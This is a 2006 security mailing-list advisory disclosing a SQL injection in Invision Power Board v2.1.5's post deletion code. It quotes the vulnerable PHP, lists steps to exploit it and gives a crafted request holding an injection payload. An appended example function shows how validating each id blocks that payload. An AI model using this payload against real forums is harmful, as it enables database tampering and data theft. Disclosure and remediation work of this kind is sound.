Date: 28 Apr 2006 08:21:50 -0000
From: o.y.6@...mail.com
To: bugtraq@...urityfocus.com
Subject: Invision Power Board v2.1.5 Remote SQL Injection

Invision Power Board v2.1.5 Remote SQL Injection

Filename :- func_mod.php
Functionname :- post_delete()
Lines :- 89 To 209
Bug Found By :- Devil-00
Greetz :- Rock Master ^ Hackers Pal ^ n0m4rcy ^ www.securtygurus.net

[CODE]
if ( is_array( $id ) )
{
    if ( count($id) > 0 )
    {
        $pid = " IN(".implode(",",$id).")";
    }
    else
    {
        return FALSE;
    }
}
else
{
    if ( intval($id) )
    {
        $pid = "=$id";
    }
    else
    {
        return FALSE;
    }
}
[/CODE]

When $id = array .. the code doesn't check it if ( INTVAL )

[CODE]
if ( count($id) > 0 )
{
    $pid = " IN(".implode(",",$id).")";
}
[/CODE]

Then We Can Do SQL Injection Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array(
    'select' => 'pid, topic_id',
    'from'   => 'posts',
    'where'  => 'pid'.$pid
) );
[/CODE]

And Here >>

[CODE]
$this->ipsclass->DB->simple_construct( array(
    'select' => '*',
    'from'   => 'attachments',
    'where'  => "attach_pid".$pid
) );
[/CODE]

Cuz We Have 2 Queries With Different Tables Number We Can't Use UNION To Exploit :( Baaad :(

Exm. To Exploit

1- First Add 2 Post
2- Check It To Delete
3- Edit String Query By HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
[/CODE]
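One way to close the gap described in the post, shown as an added example (not code from the original message or from Invision Power Board): every element of `$id` is validated as a decimal integer before the `IN(...)` fragment is built. The function name `build_pid_clause` and the sample inputs are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example: build_pid_clause() is a hypothetical helper, not IPB code.
// It returns the "=n" or " IN(n,n,...)" fragment, or null if any id is invalid.
function build_pid_clause($id): ?string
{
    // Treat a scalar and an array the same way so both paths are validated.
    $ids = is_array($id) ? $id : [$id];
    if (count($ids) === 0) {
        return null;
    }

    $clean = [];
    foreach ($ids as $value) {
        // Nested arrays, objects, floats, booleans and null are rejected outright.
        if (!is_int($value) && !is_string($value)) {
            return null;
        }
        // Only 1-10 decimal digits: no sign, whitespace, quotes, parentheses or comments.
        if (preg_match('/\A[0-9]{1,10}\z/', (string) $value) !== 1) {
            return null;
        }
        $n = (int) $value;
        if ($n < 1) {
            return null;
        }
        // Store the integer, never the original string.
        $clean[] = $n;
    }

    $clean = array_values(array_unique($clean));
    return count($clean) === 1
        ? '=' . $clean[0]
        : ' IN(' . implode(',', $clean) . ')';
}

// Constructed inputs; the third reuses the selectedpids value quoted in the post.
$samples = [
    'two valid ids'   => ['101', '102'],
    'single id'       => '101',
    'value from post' => ['-1) UNION SELECT 1,3/*'],
    'empty array'     => [],
];
foreach ($samples as $label => $input) {
    $clause = build_pid_clause($input);
    echo str_pad($label, 18), $clause === null ? 'rejected' : 'pid' . $clause, PHP_EOL;
}
```

Returning null on the first bad element corresponds to the `return FALSE` path in the quoted function, so a caller would abort before either query is constructed.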